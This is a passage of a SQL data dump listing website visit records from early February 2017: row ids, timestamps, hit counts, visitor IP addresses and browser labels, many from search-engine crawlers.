249.64.59','chrome'),(86340,1485944535,1,1,0,0,'40.77.167.12','other'),(86341,1485944692,1,0,1,0,'66.249.64.61',''),(86342,1485944803,1,1,0,0,'157.55.39.137','other'),(86343,1485945215,1,0,1,0,'66.249.64.179',''),(86344,1485945253,1,0,1,0,'66.249.64.59',''),(86345,1485945741,1,1,0,0,'40.77.167.12','other'),(86346,1485945792,1,1,0,0,'91.196.177.26','chrome'),(86347,1485946007,1,0,1,0,'66.249.64.183',''),(86348,1485946867,1,1,0,0,'40.77.167.12','other'),(86349,1485947863,1,1,0,0,'157.55.39.137','other'),(86350,1485948146,1,0,1,0,'68.180.228.230',''),(86351,1485949304,1,1,0,0,'213.154.209.203','firefox'),(86352,1485949317,2,2,0,0,'130.193.50.34','other'),(86353,1485949359,1,1,0,0,'95.108.142.31','other'),(86354,1485949823,1,1,0,0,'94.179.24.89','firefox'),(86355,1485950611,1,0,1,0,'66.249.64.179',''),(86356,1485950891,1,1,0,0,'94.179.29.161','firefox'),(86357,1485951283,1,1,0,0,'91.196.177.26','chrome'),(86358,1485951922,1,1,0,0,'40.77.167.12','other'),(86359,1485952563,1,1,0,0,'46.165.197.141','other'),(86360,1485953354,1,0,1,0,'68.180.229.62',''),(86361,1485953813,1,1,0,0,'91.196.178.136','firefox'),(86362,1485953908,1,1,0,0,'91.196.178.68','firefox'),(86363,1485954411,1,0,1,0,'66.249.64.183',''),(86364,1485956021,1,1,0,0,'91.196.177.26','chrome'),(86365,1485956820,1,1,0,0,'195.69.221.54','chrome'),(86366,1485957062,1,0,1,0,'68.180.229.62',''),(86367,1485957519,1,1,0,0,'157.55.39.61','other'),(86368,1485957986,1,1,0,0,'91.196.178.72','firefox'),(86369,1485958084,1,1,0,0,'193.194.127.217','firefox'),(86370,1485958990,1,1,0,0,'40.77.167.75','other'),(86371,1485959082,1,1,0,0,'91.196.178.70','chrome'),(86372,1485959372,1,1,0,0,'94.179.47.18','firefox'),(86373,1485960259,1,1,0,0,'91.196.178.72','chrome'),(86374,1485960264,1,0,1,0,'66.249.64.61',''),(86375,1485961033,1,1,0,0,'46.200.96.76','chrome'),(86376,1485961128,1,1,0,0,'130.180.219.84','chrome'),(86377,1485961527,2,2,0,0,'141.8.183.25','other'),(86378,1485961531,3,3,0,0,'130.193.50.34','other'),(86379,1485961535,2,2,0,0,'141.8.142.61','other'),(86380,1485961543,6,6,0,0,'130.193.51.19','other'),(86381,1485961563,1,1,0,0,'93.158.152.84','other'),(86382,1485961574,2,2,0,0,'141.8.142.175','other'),(86383,1485962438,1,0,1,0,'66.249.64.57',''),(86384,1485963244,2,0,2,0,'66.249.64.59',''),(86385,1485963572,1,1,0,0,'91.196.178.72','firefox'),(86386,1485964089,1,1,0,0,'81.23.24.135','other'),(86387,1485966138,1,1,0,0,'130.193.50.34','other'),(86388,1485967938,1,1,0,0,'37.55.225.151','firefox'),(86389,1485968031,1,1,0,0,'66.249.64.22','chrome'),(86390,1485969427,2,0,2,0,'66.249.64.7',''),(86391,1485971574,1,1,0,0,'157.55.39.61','other'),(86392,1485972757,1,1,0,0,'91.196.178.33','chrome'),(86393,1485974395,1,1,0,0,'95.108.225.193','chrome'),(86394,1485974477,1,1,0,0,'91.196.178.33','chrome'),(86395,1485974990,1,0,1,0,'66.249.64.187',''),(86396,1485975223,1,1,0,0,'66.249.64.57','chrome'),(86397,1485975572,1,1,0,0,'91.196.178.167','other'),(86398,1485975623,1,1,0,0,'91.196.178.165','chrome'),(86399,1485976167,1,1,0,0,'93.158.152.51','other'),(86400,1485976694,1,1,0,0,'91.196.178.167','chrome'),(86401,1485976755,5,5,0,0,'93.180.64.220','other'),(86402,1485977673,6,6,0,0,'93.180.64.220','other'),(86403,1485979404,1,1,0,0,'157.55.39.61','other'),(86404,1485979689,1,1,0,0,'46.211.154.252','other'),(86405,1485981206,1,1,0,0,'93.76.121.225','firefox'),(86406,1485981544,1,1,0,0,'66.249.76.109','chrome'),(86407,1485981546,1,0,1,0,'66.249.66.40',''),(86408,1485982561,1,1,0,0,'157.55.39.61','other'),(86409,1485983637,1,1,0,0,'157.55.39.61','other'),(86410,1485984028,1,1,0,0,'157.55.39.78','other'),(86411,1485984570,2,2,0,0,'157.55.39.137','other'),(86412,1485985153,1,1,0,0,'157.55.39.78','other'),(86413,1485994041,1,1,0,0,'66.249.76.91','chrome'),(86414,1485994747,1,0,1,0,'66.249.66.43',''),(86415,1485994790,1,0,1,0,'66.249.66.37',''),(86416,1485994827,2,0,2,0,'66.249.76.108',''),(86417,1485994861,3,0,3,0,'66.249.76.107',''),(86418,1485995078,1,0,1,0,'66.249.76.109',''),(86419,1485996182,1,1,0,0,'163.172.64.199','other'),(86420,1485999408,1,1,0,0,'163.172.64.231','other'),(86421,1486000153,1,1,0,0,'163.172.64.178','other'),(86422,1486000172,2,0,2,0,'66.249.76.107',''),(86423,1486000422,1,1,0,0,'163.172.64.245','other'),(86424,1486003107,1,0,1,0,'68.180.228.230',''),(86425,1486003847,2,2,0,0,'157.55.39.61','other'),(86426,1486005425,1,1,0,0,'63.243.252.138','other'),(86427,1486006898,1,1,0,0,'157.55.39.78','other'),(86428,1486008356,1,0,1,0,'66.249.76.91',''),(86429,1486008813,3,3,0,0,'66.249.76.109','chrome'),(86430,1486008887,1,1,0,0,'66.249.76.108','chrome'),(86431,1486012969,1,0,1,0,'66.249.76.107',''),(86432,1486013327,2,0,2,0,'66.249.66.246',''),(86433,1486013348,1,0,1,0,'66.249.66.40',''),(86434,1486013370,1,0,1,0,'66.249.76.108',''),(86435,1486013374,2,0,2,0,'66.249.66.37',''),(86436,1486014578,1,1,0,0,'91.196.178.66','firefox'),(86437,1486015084,1,1,0,0,'66.249.76.108','chrome'),(86438,1486015659,1,1,0,0,'91.124.8.65','chrome'),(86439,1486016587,1,0,1,0,'66.249.76.91',''),(86440,1486016829,1,1,0,0,'157.55.39.245','other'),(86441,1486016955,1,1,0,0,'130.193.50.34','other'),(86442,1486017245,1,1,0,0,'163.172.64.253','other'),(86443,1486017482,1,1,0,0,'66.249.93.93','chrome'),(86444,1486017910,1,1,0,0,'37.52.23.154','chrome'),(86445,1486018336,1,1,0,0,'46.201.241.5','chrome'),(86446,1486018546,1,1,0,0,'91.196.178.72','chrome'),(86447,1486018858,1,1,0,0,'91.196.178.66','firefox'),(86448,1486019343,1,1,0,0,'91.196.178.72','firefox'),(86449,1486019664,1,1,0,0,'31.13.102.104','other'),(86450,1486019672,1,1,0,0,'31.13.114.49','other'),(86451,1486019709,1,1,0,0,'195.211.23.206','other'),(86452,1486019826,2,2,0,0,'91.196.178.66','firefox'),(86453,1486020296,1,1,0,0,'163.172.64.186','other'),(86454,1486020469,1,1,0,0,'78.111.185.242','firefox'),(86455,1486020668,1,1,0,0,'46.164.130.92','firefox'),(86456,1486020786,1,1,0,0,'163.172.64.241','other'),(86457,1486020800,1,1,0,0,'91.196.178.165','chrome'),(86458,1486020864,1,1,0,0,'91.196.178.66','firefox'),(86459,1486020923,1,1,0,0,'94.179.101.42','firefox'),(86460,1486021249,1,1,0,0,'91.196.178.72','firefox'),(86461,1486021324,1,1,0,0,'95.135.50.150','chrome'),(86462,1486021483,1,1,0,0,'91.196.178.133','firefox'),(86463,1486021551,1,1,0,0,'37.53.225.75','firefox'),(86464,1486022159,1,1,0,0,'91.196.178.72','firefox'),(86465,1486022580,1,1,0,0,'91.196.178.66','firefox'),(86466,1486022604,1,1,0,0,'91.209.64.42','chrome'),(86467,1486022942,1,1,0,0,'178.92.201.58','chrome'),(86468,1486023521,1,1,0,0,'66.249.76.108','chrome'),(86469,1486023592,1,1,0,0,'91.196.178.66','firefox'),(86470,1486023675,1,1,0,0,'66.249.76.107','chrome'),(86471,1486024042,1,1,0,0,'157.55.39.78','other'),(86472,1486024363,1,1,0,0,'82.207.91.234','firefox'),(86473,1486024454,1,1,0,0,'178.94.251.10','chrome'),(86474,1486024653,1,0,1,0,'66.249.76.93',''),(86475,1486024809,1,1,0,0,'95.135.50.150','chrome'),(86476,1486024937,1,1,0,0,'66.249.76.109','chrome'),(86477,1486025245,1,1,0,0,'163.172.64.245','other'),(86478,1486025304,1,0,1,0,'66.249.76.107',''),(86479,1486025520,1,1,0,0,'37.53.225.49','chrome'),(86480,1486025537,1,1,0,0,'141.8.142.175','other'),(86481,1486026101,1,1,0,0,'95.134.62.129','opera'),(86482,1486026170,1,1,0,0,'91.196.178.66','firefox'),(86483,1486026617,1,1,0,0,'82.145.222.196','other'),(86484,1486026620,1,1,0,0,'37.53.225.75','firefox'),(86485,1486026957,2,0,2,0,'66.249.76.108',''),(86486,1486027152,1,0,1,0,'66.249.76.109',''),(86487,1486027274,1,1,0,0,'91.196.177.46','chrome'),(86488,1486027362,2,2,0,0,'130.193.50.34','other'),(86489,1486027618,1,1,0,0,'82.145.222.196','other'),(86490,1486027639,1,1,0,0,'82.145.222.196','opera'),(86491,1486027700,1,1,0,0,'37.55.56.144','chrome'),(86492,1486027985,1,1,0,0,'163.172.64.233','other'),(86493,1486028282,1,1,0,0,'91.196.178.68','firefox'),(86494,1486028586,1,1,0,0,'66.249.66.43','chrome'),(86495,1486028648,1,0,1,0,'66.249.76.107',''),(86496,1486028895,1,1,0,0,'66.249.76.109','chrome'),(86497,1486028942,1,1,0,0,'91.196.177.46','firefox'),(86498,1486029788,1,1,0,0,'37.53.225.75','firefox'),(86499,1486030183,1,1,0,0,'157.55.39.78','other'),(86500,1486030492,1,0,1,0,'66.249.76.89',''),(86501,1486030814,1,1,0,0,'94.179.43.83','firefox'),(86502,1486031247,1,1,0,0,'151.80.33.36','other'),(86503,1486031397,1,1,0,0,'37.52.157.115','firefox'),(86504,1486031684,1,1,0,0,'163.172.71.225','other'),(86505,1486031742,1,1,0,0,'91.196.178.72','chrome'),(86506,1486031908,2,2,0,0,'91.196.177.59','chrome'),(86507,1486032377,1,1,0,0,'163.172.64.230','other'),(86508,1486032603,1,1,0,0,'66.249.66.37','chrome'),(86509,1486032604,1,1,0,0,'91.196.177.46','firefox'),(86510,1486032636,2,1,1,0,'66.249.76.89',''),(86511,1486033104,1,1,0,0,'66.249.76.109','chrome'),(86512,1486033367,1,1,0,0,'46.200.176.114','chrome'),(86513,1486033745,1,1,0,0,'66.249.76.108','chrome'),(86514,1486033795,1,1,0,0,'66.249.76.107','chrome'),(86515,1486033916,1,1,0,0,'94.178.104.200','chrome'),(86516,1486034895,1,1,0,0,'95.135.9.21','firefox'),(86517,1486034939,1,1,0,0,'91.196.177.46','chrome'),(86518,1486035106,1,1,0,0,'188.163.68.246','firefox'),(86519,1486035379,1,1,0,0,'91.196.178.71','firefox'),(86520,1486035569,1,1,0,0,'207.46.13.102','other'),(86521,1486035798,1,1,0,0,'130.193.50.34','other'),(86522,1486036000,1,1,0,0,'108.59.8.70','other'),(86523,1486036137,2,2,0,0,'93.74.49.14','chrome'),(86524,1486036275,1,1,0,0,'78.152.169.120','chrome'),(86525,1486036457,1,1,0,0,'163.172.64.182','other'),(86526,1486037274,1,1,0,0,'178.95.99.18','chrome'),(86527,1486037649,1,1,0,0,'180.76.15.11','other'),(86528,1486038194,1,1,0,0,'37.73.230.194','chrome'),(86529,1486038258,1,1,0,0,'130.193.51.19','other'),(86530,1486038487,1,1,0,0,'91.196.177.26','chrome'),(86531,1486038602,1,1,0,0,'95.134.204.218','chrome'),(86532,1486039024,1,1,0,0,'163.172.64.178','other'),(86533,1486039504,1,1,0,0,'163.172.64.180','other'),(86534,1486039532,1,1,0,0,'91.196.177.46','firefox'),(86535,1486039724,1,1,0,0,'66.249.76.107','chrome'),(86536,1486040208,1,1,0,0,'157.55.39.78','other'),(86537,1486040384,1,1,0,0,'186.9.131.57','other'),(86538,1486040864,1,1,0,0,'91.196.178.65','firefox'),(86539,1486041076,1,1,0,0,'46.164.155.57','chrome'),(86540,1486041431,1,1,0,0,'37.52.23.154','chrome'),(86541,1486041434,2,2,0,0,'91.196.178.66','firefox'),(86542,1486042213,1,1,0,0,'130.180.216.91','chrome'),(86543,1486043324,1,1,0,0,'91.196.179.134','chrome'),(86544,1486043427,1,1,0,0,'94.179.43.83','firefox'),(86545,1486043490,1,1,0,0,'91.196.177.26','chrome'),(86546,1486043520,1,1,0,0,'52.29.26.11','firefox'),(86547,1486043843,1,1,0,0,'163.172.64.228','other'),(86548,1486043968,1,1,0,0,'109.237.88.245','chrome'),(86549,1486044001,1,1,0,0,'92.112.218.197','firefox'),(86550,1486044313,1,0,1,0,'66.249.66.40',''),(86551,1486044605,1,1,0,0,'163.172.64.181','other'),(86552,1486045685,2,2,0,0,'91.196.178.65','chrome'),(86553,1486045957,1,0,1,0,'66.249.76.108',''),(86554,1486046090,1,1,0,0,'176.118.49.113','chrome'),(86555,1486046943,1,1,0,0,'207.46.13.102','other'),(86556,1486047725,1,1,0,0,'46.211.200.27','chrome'),(86557,1486048164,1,1,0,0,'46.164.159.190','chrome'),(86558,1486048511,1,1,0,0,'91.196.177.46','firefox'),(86559,1486048739,1,1,0,0,'163.172.64.179','other'),(86560,1486049813,1,1,0,0,'163.172.64.243','other'),(86561,1486049979,1,0,1,0,'66.249.66.37',''),(86562,1486049995,1,1,0,0,'163.172.64.234','other'),(86563,1486050893,1,1,0,0,'157.55.39.81','other'),(86564,1486050980,1,1,0,0,'66.249.76.109','chrome'),(86565,1486050984,1,1,0,0,'66.249.66.250','chrome'),(86566,1486051791,2,2,0,0,'66.249.76.108','chrome'),(86567,1486051892,1,1,0,0,'37.73.232.89','other'),(86568,1486051897,1,1,0,0,'37.73.232.89','chrome'),(86569,1486052818,1,1,0,0,'95.132.132.195','chrome'),(86570,1486052954,1,1,0,0,'94.254.161.204','chrome'),(86571,1486053368,1,1,0,0,'163.172.64.192','other'),(86572,1486053697,1,1,0,0,'91.196.178.67','chrome'),(86573,1486053979,1,0,1,0,'66.249.76.93',''),(86574,1486055082,1,1,0,0,'91.196.178.136','chrome'),(86575,1486055240,1,1,0,0,'94.179.2.172','firefox'),(86576,1486056128,1,1,0,0,'163.172.64.248','other'),(86577,1486056898,1,1,0,0,'130.193.50.34','other'),(86578,1486057621,1,1,0,0,'46.219.244.122','chrome'),(86579,1486057705,1,1,0,0,'194.44.83.45','chrome'),(86580,1486057771,1,1,0,0,'157.55.39.78','other'),(86581,1486058262,1,1,0,0,'163.172.64.189','other'),(86582,1486058380,1,1,0,0,'91.196.178.38','chrome'),(86583,1486058554,1,1,0,0,'95.132.133.199','other'),(86584,1486058793,1,1,0,0,'130.193.50.34','other'),(86585,1486058798,1,1,0,0,'91.196.178.37','chrome'),(86586,1486058930,1,1,0,0,'46.219.244.122','chrome'),(86587,1486059463,1,0,1,0,'66.249.64.57',''),(86588,1486059806,1,1,0,0,'141.0.12.36','other'),(86589,1486060086,1,1,0,0,'66.249.64.59','chrome'),(86590,1486060696,2,2,0,0,'130.193.50.34','other'),(86591,1486060716,1,1,0,0,'141.8.142.175','other'),(86592,1486060937,1,1,0,0,'62.210.101.101','other'),(86593,1486061510,1,0,1,0,'66.249.64.61',''),(86594,1486061783,1,1,0,0,'46.211.250.118','chrome'),(86595,1486061819,1,1,0,0,'157.55.39.78','other'),(86596,1486062071,1,1,0,0,'163.172.64.178','other'),(86597,1486063380,2,2,0,0,'94.179.0.111','chrome'),(86598,1486063916,1,1,0,0,'46.211.136.191','chrome'),(86599,1486066383,1,1,0,0,'207.46.13.93','other'),(86600,1486066546,1,1,0,0,'178.92.84.164','chrome'),(86601,1486066706,1,1,0,0,'217.69.133.216','other'),(86602,1486066709,1,0,1,0,'66.249.64.61',''),(86603,1486068392,1,1,0,0,'207.46.13.102','other'),(86604,1486068959,1,1,0,0,'157.55.39.81','other'),(86605,1486069147,1,0,1,0,'68.180.229.62',''),(86606,1486070024,1,1,0,0,'163.172.64.241','other'),(86607,1486070140,1,1,0,0,'46.201.112.223','firefox'),(86608,1486070962,1,1,0,0,'163.172.68.128','other'),(86609,1486071833,1,1,0,0,'163.172.64.250','other'),(86610,1486073183,1,1,0,0,'37.115.120.174','chrome'),(86611,1486073724,1,1,0,0,'66.249.64.57','chrome'),(86612,1486074021,1,1,0,0,'163.172.64.233','other'),(86613,1486075819,1,0,1,0,'68.180.229.62',''),(86614,1486075909,1,0,1,0,'66.249.64.57',''),(86615,1486078831,1,1,0,0,'163.172.71.225','other'),(86616,1486079889,1,1,0,0,'141.8.183.25','other'),(86617,1486082318,1,1,0,0,'163.172.64.187','other'),(86618,1486082390,1,0,1,0,'66.249.64.61',''),(86619,1486082653,38,38,0,0,'208.43.225.84','other'),(86620,1486082701,11,11,0,0,'208.43.225.85','other'),(86621,1486083494,1,1,0,0,'163.172.64.248','other'),(86622,1486083782,1,1,0,0,'163.172.64.240','other'),(86623,1486084212,1,1,0,0,'66.249.64.59','chrome'),(86624,1486085313,1,1,0,0,'157.55.39.81','other'),(86625,1486086124,1,0,1,0,'66.249.64.61',''),(86626,1486086131,2,0,2,0,'66.249.64.57',''),(86627,1486087144,1,1,0,0,'163.172.64.248','other'),(86628,1486087390,1,0,1,0,'66.249.64.179',''),(86629,1486091061,1,1,0,0,'163.172.64.232','other'),(86630,1486091069,1,1,0,0,'163.172.64.231','other'),(86631,1486091088,1,1,0,0,'180.76.15.139','other'),(86632,1486091560,1,1,0,0,'163.172.64.228','other'),(86633,1486091595,1,1,0,0,'163.172.64.234','other'),(86634,1486094113,1,1,0,0,'87.76.242.171','chrome'),(86635,1486094576,1,0,1,0,'66.249.64.183',''),(86636,1486096464,1,1,0,0,'178.137.83.166','chrome'),(86637,1486096800,1,1,0,0,'91.196.178.133','other'),(86638,1486099341,1,0,1,0,'66.249.64.187',''),(86639,1486100393,1,0,1,0,'66.249.64.61',''),(86640,1486100668,1,1,0,0,'91.196.178.67','firefox'),(86641,1486101568,1,0,1,0,'66.249.64.183',''),(86642,1486102623,1,1,0,0,'130.193.50.34','other'),(86643,1486102903,4,4,0,0,'93.180.64.220','other'),(86644,1486103049,1,1,0,0,'66.249.93.89','chrome'),(86645,1486103342,1,1,0,0,'207.46.13.152','other'),(86646,1486103885,2,2,0,0,'93.180.64.220','other'),(86647,1486104899,1,1,0,0,'180.76.15.136','other'),(86648,1486105534,1,1,0,0,'141.8.142.175','other'),(86649,1486105693,1,1,0,0,'91.196.178.66','firefox'),(86650,1486106113,1,1,0,0,'91.196.178.37','chrome'),(86651,1486106680,1,1,0,0,'37.53.224.49','chrome'),(86652,1486106694,1,1,0,0,'130.193.50.34','other'),(86653,1486107818,1,0,1,0,'66.249.64.187',''),(86654,1486107857,1,1,0,0,'91.196.177.46','firefox'),(86655,1486107899,1,1,0,0,'91.196.178.38','firefox'),(86656,1486108141,1,1,0,0,'46.200.108.181','chrome'),(86657,1486108245,1,1,0,0,'91.196.178.65','chrome'),(86658,1486108274,1,1,0,0,'91.196.178.72','opera'),(86659,1486108285,1,1,0,0,'91.196.178.40','firefox'),(86660,1486108721,1,1,0,0,'178.92.22.103','chrome'),(86661,1486108739,1,1,0,0,'141.8.183.25','other'),(86662,1486108918,1,1,0,0,'180.76.15.12','other'),(86663,1486110021,1,1,0,0,'207.46.13.172','other'),(86664,1486110695,1,1,0,0,'91.196.178.72','chrome'),(86665,1486110793,1,1,0,0,'91.196.178.37','chrome'),(86666,1486111358,1,0,1,0,'66.249.64.57',''),(86667,1486111496,1,1,0,0,'163.172.64.243','other'),(86668,1486111899,1,1,0,0,'91.196.178.132','firefox'),(86669,1486111968,1,1,0,0,'130.193.50.34','other'),(86670,1486111971,1,1,0,0,'91.196.177.26','chrome'),(86671,1486112031,1,1,0,0,'130.193.51.19','other'),(86672,1486112216,1,1,0,0,'91.196.178.72','chrome'),(86673,1486112266,1,1,0,0,'193.194.127.217','firefox'),(86674,1486112505,1,1,0,0,'130.180.220.92','firefox'),(86675,1486113130,1,1,0,0,'91.196.178.65','chrome'),(86676,1486113333,1,1,0,0,'37.52.121.156','chrome'),(86677,1486113343,1,1,0,0,'130.193.50.34','other'),(86678,1486113731,1,1,0,0,'92.112.70.205','firefox'),(86679,1486113951,1,1,0,0,'194.44.121.25','chrome'),(86680,1486114823,1,1,0,0,'91.196.178.136','chrome'),(86681,1486115248,1,1,0,0,'207.46.13.172','other'),(86682,1486115265,1,1,0,0,'5.9.98.178','other'),(86683,1486115666,1,1,0,0,'163.172.64.230','other'),(86684,1486116170,1,1,0,0,'5.9.98.178','other'),(86685,1486116527,1,1,0,0,'94.179.10.6','firefox'),(86686,1486116649,1,1,0,0,'92.113.51.155','chrome'),(86687,1486116993,1,1,0,0,'91.196.178.65','firefox'),(86688,1486117074,1,1,0,0,'5.9.98.178','other'),(86689,1486117498,1,1,0,0,'46.211.137.65','chrome'),(86690,1486117714,1,1,0,0,'91.196.177.26','chrome'),(86691,1486117781,1,1,0,0,'31.43.5.118','chrome'),(86692,1486117919,1,1,0,0,'91.196.178.130','firefox'),(86693,1486117964,1,1,0,0,'91.196.178.65','firefox'),(86694,1486117982,1,1,0,0,'5.9.98.178','other'),(86695,1486117992,1,1,0,0,'91.196.178.72','chrome'),(86696,1486118324,1,1,0,0,'66.249.93.202','chrome'),(86697,1486118325,1,1,0,0,'66.102.9.131','chrome'),(86698,1486118714,1,1,0,0,'178.94.24.123','chrome'),(86699,1486118883,1,1,0,0,'5.9.98.178','other'),(86700,1486119053,1,1,0,0,'66.249.93.205','chrome'),(86701,1486119064,1,1,0,0,'93.158.152.75','other'),(86702,1486119117,1,1,0,0,'91.196.177.15','chrome'),(86703,1486119274,1,1,0,0,'91.196.178.72','chrome'),(86704,1486119785,1,1,0,0,'5.9.98.178','other'),(86705,1486121570,1,1,0,0,'163.172.64.237','other'),(86706,1486121624,1,1,0,0,'95.132.93.233','chrome'),(86707,1486121906,1,1,0,0,'92.113.23.6','chrome'),(86708,1486122021,1,1,0,0,'163.172.71.225','other'),(86709,1486122103,1,1,0,0,'180.76.15.138','other'),(86710,1486122393,1,1,0,0,'163.172.64.220','other'),(86711,1486122894,1,1,0,0,'91.196.178.68','chrome'),(86712,1486124149,1,1,0,0,'188.32.188.132','chrome'),(86713,1486124294,1,1,0,0,'94.179.56.216','chrome'),(86714,1486124784,1,0,1,0,'66.249.64.183',''),(86715,1486124882,2,2,0,0,'91.196.178.68','chrome'),(86716,1486125057,1,1,0,0,'91.196.178.130','firefox'),(86717,1486125465,1,1,0,0,'91.196.177.26','chrome'),(86718,1486125566,1,1,0,0,'37.73.205.176','chrome'),(86719,1486125680,1,1,0,0,'91.196.178.65','firefox'),(86720,1486125898,1,1,0,0,'37.55.186.83','chrome'),(86721,1486126656,1,1,0,0,'91.196.178.66','firefox'),(86722,1486127550,1,1,0,0,'82.207.49.106','chrome'),(86723,1486127910,1,1,0,0,'163.172.64.224','other'),(86724,1486127919,1,1,0,0,'91.196.178.66','firefox'),(86725,1486127949,1,1,0,0,'91.196.178.161','chrome'),(86726,1486128776,1,1,0,0,'207.46.13.172','other'),(86727,1486128936,1,1,0,0,'37.52.23.154','chrome'),(86728,1486129365,1,1,0,0,'46.201.241.5','chrome'),(86729,1486130080,1,1,0,0,'91.196.178.161','chrome'),(86730,1486130673,1,1,0,0,'91.196.177.46','firefox'),(86731,1486130772,1,1,0,0,'178.93.10.91','chrome'),(86732,1486131517,1,1,0,0,'91.196.178.161','chrome'),(86733,1486131526,1,1,0,0,'163.172.64.193','other'),(86734,1486131949,1,1,0,0,'162.210.196.129','other'),(86735,1486132265,1,1,0,0,'91.196.178.165','chrome'),(86736,1486132302,1,1,0,0,'176.120.100.18','firefox'),(86737,1486132943,1,1,0,0,'163.172.64.249','other'),(86738,1486135504,1,1,0,0,'95.135.138.243','chrome'),(86739,1486135657,1,0,1,0,'66.249.64.183',''),(86740,1486136794,1,1,0,0,'91.196.178.166','chrome'),(86741,1486137285,1,0,1,0,'66.249.64.59',''),(86742,1486137309,1,1,0,0,'91.196.178.65','firefox'),(86743,1486137972,1,1,0,0,'91.196.178.33','chrome'),(86744,1486138420,1,1,0,0,'141.8.142.61','other'),(86745,1486140350,1,1,0,0,'130.180.212.171','chrome'),(86746,1486140370,1,1,0,0,'40.77.167.56','other'),(86747,1486142600,1,1,0,0,'94.179.86.193','chrome'),(86748,1486142818,1,1,0,0,'40.77.167.56','other'),(86749,1486143188,2,1,1,0,'66.249.65.62',''),(86750,1486145296,1,1,0,0,'66.249.65.57','chrome'),(86751,1486145496,1,1,0,0,'178.92.74.60','firefox'),(86752,1486146002,1,1,0,0,'91.124.181.34','chrome'),(86753,1486146389,1,0,1,0,'66.249.65.56',''),(86754,1486147183,1,0,1,0,'66.249.65.62',''),(86755,1486147707,1,1,0,0,'180.76.15.149','other'),(86756,1486148150,1,1,0,0,'141.8.142.67','other'),(86757,1486148277,2,2,0,0,'130.193.50.34','other'),(86758,1486148340,1,1,0,0,'141.8.142.175','other'),(86759,1486148526,1,1,0,0,'66.249.65.62','chrome'),(86760,1486148528,1,1,0,0,'66.249.65.57','chrome'),(86761,1486149166,1,1,0,0,'130.193.51.19','other'),(86762,1486150088,1,1,0,0,'163.172.64.247','other'),(86763,1486151891,1,1,0,0,'130.193.50.34','other'),(86764,1486152328,1,1,0,0,'66.249.65.55','chrome'),(86765,1486152905,1,1,0,0,'130.193.50.34','other'),(86766,1486152907,1,1,0,0,'207.46.13.152','other'),(86767,1486153449,1,1,0,0,'207.46.13.172','other'),(86768,1486156272,1,0,1,0,'66.249.65.61',''),(86769,1486159143,1,1,0,0,'163.172.64.243','other'),(86770,1486159852,1,0,1,0,'68.180.229.62',''),(86771,1486160396,1,1,0,0,'163.172.64.199','other'),(86772,1486160745,1,1,0,0,'163.172.64.252','other'),(86773,1486162262,1,1,0,0,'163.172.64.186','other'),(86774,1486163460,1,0,1,0,'66.249.65.55',''),(86775,1486163572,1,1,0,0,'207.46.13.55','other'),(86776,1486163637,1,0,1,0,'66.249.65.60',''),(86777,1486164288,2,0,2,0,'66.249.65.62',''),(86778,1486164938,1,1,0,0,'163.172.64.247','other'),(86779,1486166070,1,0,1,0,'66.249.65.62',''),(86780,1486166684,1,0,1,0,'66.249.65.60',''),(86781,1486168425,2,2,0,0,'69.30.198.186','other'),(86782,1486170319,1,0,1,0,'66.249.65.60',''),(86783,1486172690,1,0,1,0,'66.249.65.62',''),(86784,1486173358,1,1,0,0,'180.76.15.138','other'),(86785,1486175114,1,1,0,0,'163.172.64.229','other'),(86786,1486175617,1,1,0,0,'207.46.13.55','other'),(86787,1486177553,1,0,1,0,'66.249.65.60',''),(86788,1486180359,1,1,0,0,'207.46.13.172','other'),(86789,1486180361,2,0,2,0,'68.180.228.230',''),(86790,1486181054,1,1,0,0,'207.46.13.55','other'),(86791,1486181417,1,1,0,0,'163.172.64.235','other'),(86792,1486181804,2,0,2,0,'68.180.228.230',''),(86793,1486181878,1,0,1,0,'66.249.65.60',''),(86794,1486182662,1,0,1,0,'66.249.65.61',''),(86795,1486183041,1,1,0,0,'163.172.64.232','other'),(86796,1486183692,1,1,0,0,'163.172.64.237','other'),(86797,1486183932,1,0,1,0,'68.180.228.230',''),(86798,1486185351,1,1,0,0,'66.249.65.62','chrome'),(86799,1486185519,1,1,0,0,'207.46.13.172','other'),(86800,1486186009,1,1,0,0,'163.172.64.245','other'),(86801,1486186150,1,0,1,0,'66.249.65.60',''),(86802,1486186830,1,0,1,0,'66.249.65.62',''),(86803,1486186954,1,1,0,0,'180.76.15.31','other'),(86804,1486187247,1,1,0,0,'207.46.13.152','other'),(86805,1486187619,1,1,0,0,'40.77.167.56','other'),(86806,1486188277,1,0,1,0,'68.180.228.230',''),(86807,1486188393,1,1,0,0,'163.172.64.230','other'),(86808,1486190345,2,2,0,0,'95.213.141.126','opera'),(86809,1486191559,1,1,0,0,'178.92.250.59','chrome'),(86810,1486191783,1,0,1,0,'66.249.65.60',''),(86811,1486193250,1,1,0,0,'66.249.93.202','chrome'),(86812,1486193972,1,1,0,0,'141.8.142.61','other'),(86813,1486193976,1,1,0,0,'66.249.93.93','chrome'),(86814,1486195623,1,1,0,0,'207.46.13.55','other'),(86815,1486195753,1,0,1,0,'66.249.65.60',''),(86816,1486196909,1,1,0,0,'66.249.65.62','chrome'),(86817,1486197647,1,0,1,0,'66.249.65.61',''),(86818,1486198210,1,1,0,0,'207.46.13.55','other'),(86819,1486198310,1,1,0,0,'109.63.191.247','chrome'),(86820,1486198883,1,0,1,0,'66.249.65.61',''),(86821,1486199245,1,1,0,0,'163.172.64.178','other'),(86822,1486199470,1,0,1,0,'66.249.65.57',''),(86823,1486200310,1,1,0,0,'163.172.64.243','other'),(86824,1486200553,1,1,0,0,'163.172.64.177','other'),(86825,1486200594,1,1,0,0,'92.113.135.35','chrome'),(86826,1486201446,1,1,0,0,'178.92.74.60','firefox'),(86827,1486202362,1,1,0,0,'37.144.48.93','chrome'),(86828,1486202686,1,0,1,0,'66.249.65.56',''),(86829,1486203286,1,1,0,0,'78.111.190.243','firefox'),(86830,1486204471,1,0,1,0,'66.249.65.62',''),(86831,1486205455,1,1,0,0,'207.46.13.152','other'),(86832,1486205487,1,1,0,0,'66.249.65.60','chrome'),(86833,1486207293,1,0,1,0,'68.180.229.62',''),(86834,1486209595,1,1,0,0,'93.158.152.40','other'),(86836,1486210882,1,1,0,0,'163.172.64.192','other'),(86837,1486211045,1,1,0,0,'199.58.86.206','other'),(86838,1486211619,1,1,0,0,'66.249.65.56','chrome'),(86839,1486211654,1,1,0,0,'66.249.65.60','chrome'),(86840,1486212671,2,2,0,0,'195.154.185.20','other'),(86841,1486213786,1,1,0,0,'91.196.178.38','chrome'),(86842,1486217749,1,1,0,0,'180.76.15.163','other'),(86843,1486217770,1,1,0,0,'207.46.13.172','other'),(86844,1486219170,1,1,0,0,'163.172.64.233','other'),(86845,1486223062,1,1,0,